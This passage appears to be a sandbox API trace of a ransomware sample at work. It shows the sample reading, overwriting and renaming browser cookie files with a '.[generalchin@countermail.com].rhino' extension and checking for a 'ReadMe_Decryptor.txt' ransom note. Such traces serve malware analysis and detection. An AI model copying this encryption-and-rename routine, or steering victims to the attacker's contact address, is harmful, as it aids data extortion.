HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0088.753] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0470 | out: hHeap=0x6d0000) returned 1 [0088.753] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02e8 | out: hHeap=0x6d0000) returned 1 [0088.753] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00e0 | out: hHeap=0x6d0000) returned 1 [0088.753] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x72a920 [0088.753] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0088.753] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x23b0048 [0088.753] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x23b00e0 [0088.753] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0088.753] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.753] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00e0 | out: hHeap=0x6d0000) returned 1 [0088.753] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0088.754] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x6f [0088.754] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x18f, nNumberOfBytesToLockHigh=0x0) returned 1 [0088.754] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.755] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0088.756] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.757] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x6f, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x6f, lpOverlapped=0x0) returned 1 [0088.757] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0088.757] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.757] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0088.757] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0088.757] GetLastError () returned 0x0 [0088.757] SetLastError (dwErrCode=0x0) [0088.757] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0088.757] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6f) returned 0x23b0048 [0088.757] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0088.758] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b00c0 [0088.758] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b01c8 [0088.758] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00c0 | out: hHeap=0x6d0000) returned 1 [0088.758] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.758] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0088.758] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0088.758] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.758] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0088.758] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0088.758] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0088.758] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.758] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0088.758] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0088.758] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df140 [0088.758] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.758] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0088.758] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0088.758] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0088.759] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0088.759] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0088.759] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0088.759] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0088.759] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0088.759] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0088.759] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0088.759] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0088.759] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0088.759] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x23b00c0 [0088.759] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0088.759] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18f) returned 0x23b0350 [0088.759] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00c0 | out: hHeap=0x6d0000) returned 1 [0088.759] WriteFile (in: hFile=0xec, lpBuffer=0x23b0350*, nNumberOfBytesToWrite=0x18f, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x23b0350*, lpNumberOfBytesWritten=0x2cfa04*=0x18f, lpOverlapped=0x0) returned 1 [0088.759] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0350 | out: hHeap=0x6d0000) returned 1 [0088.759] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x18f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0088.759] CloseHandle (hObject=0xec) returned 1 [0088.760] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f4a0 [0088.761] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14e) returned 0x23b0350 [0088.761] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77f4a0 | out: hHeap=0x6d0000) returned 1 [0088.761] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0088.762] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0350 | out: hHeap=0x6d0000) returned 1 [0088.762] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b01c8 | out: hHeap=0x6d0000) returned 1 [0088.762] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0088.762] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x23b0048 [0088.762] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0088.762] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x72a920 [0088.762] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x23b00e0 [0088.762] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0088.762] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.762] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00e0 | out: hHeap=0x6d0000) returned 1 [0088.763] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0088.763] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x6e [0088.764] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x18e, nNumberOfBytesToLockHigh=0x0) returned 1 [0088.764] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.764] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0088.766] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.766] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x6e, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x6e, lpOverlapped=0x0) returned 1 [0088.766] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0088.766] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.766] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0088.766] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0088.766] GetLastError () returned 0x0 [0088.816] SetLastError (dwErrCode=0x0) [0088.816] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0088.816] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6e) returned 0x72a920 [0088.816] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0088.816] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b00e0 [0088.816] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b01e8 [0088.816] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00e0 | out: hHeap=0x6d0000) returned 1 [0088.816] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.816] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0088.816] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0088.816] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.816] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0088.816] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0088.816] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0088.817] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.817] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0088.817] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0088.817] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0088.817] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.817] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df140 [0088.817] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0088.817] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0088.817] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0088.817] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0088.817] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0088.817] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0088.817] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0088.817] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0088.817] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0088.817] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0088.818] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0088.818] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x23b00e0 [0088.818] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0088.818] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18e) returned 0x23b0370 [0088.818] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00e0 | out: hHeap=0x6d0000) returned 1 [0088.818] WriteFile (in: hFile=0xec, lpBuffer=0x23b0370*, nNumberOfBytesToWrite=0x18e, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x23b0370*, lpNumberOfBytesWritten=0x2cfa04*=0x18e, lpOverlapped=0x0) returned 1 [0088.818] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0370 | out: hHeap=0x6d0000) returned 1 [0088.818] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x18e, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0088.818] CloseHandle (hObject=0xec) returned 1 [0088.819] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f4a0 [0088.819] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14e) returned 0x23b0370 [0088.819] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77f4a0 | out: hHeap=0x6d0000) returned 1 [0088.819] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0088.820] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0370 | out: hHeap=0x6d0000) returned 1 [0088.820] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b01e8 | out: hHeap=0x6d0000) returned 1 [0088.820] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0088.820] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x72a920 [0088.821] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0088.821] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x23b0048 [0088.821] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x23b00e0 [0088.821] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0088.821] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.821] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00e0 | out: hHeap=0x6d0000) returned 1 [0088.821] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@google[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@google[2].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0088.835] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x114 [0088.836] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x234, nNumberOfBytesToLockHigh=0x0) returned 1 [0088.836] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.836] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0088.838] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.838] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x114, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x114, lpOverlapped=0x0) returned 1 [0088.838] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0088.838] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.838] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0088.838] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0088.838] GetLastError () returned 0x0 [0088.839] SetLastError (dwErrCode=0x0) [0088.839] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0088.839] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x114) returned 0x23b0048 [0088.839] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0088.839] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b0168 [0088.839] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b0270 [0088.839] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0168 | out: hHeap=0x6d0000) returned 1 [0088.839] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.839] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0088.839] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0088.839] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.839] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0088.839] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0088.839] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0088.839] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.839] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0088.839] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0088.839] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df140 [0088.839] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.839] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0088.839] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0088.839] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0088.840] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0088.840] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0088.840] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0088.841] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0088.841] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0088.841] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0088.841] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0088.841] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0088.841] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0088.841] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x23b0168 [0088.841] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0088.841] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x23b03f8 [0088.841] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0168 | out: hHeap=0x6d0000) returned 1 [0088.841] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23b04d8 [0088.841] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b03f8 | out: hHeap=0x6d0000) returned 1 [0088.841] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x234) returned 0x23b0620 [0088.841] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b04d8 | out: hHeap=0x6d0000) returned 1 [0088.841] WriteFile (in: hFile=0x104, lpBuffer=0x23b0620*, nNumberOfBytesToWrite=0x234, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: 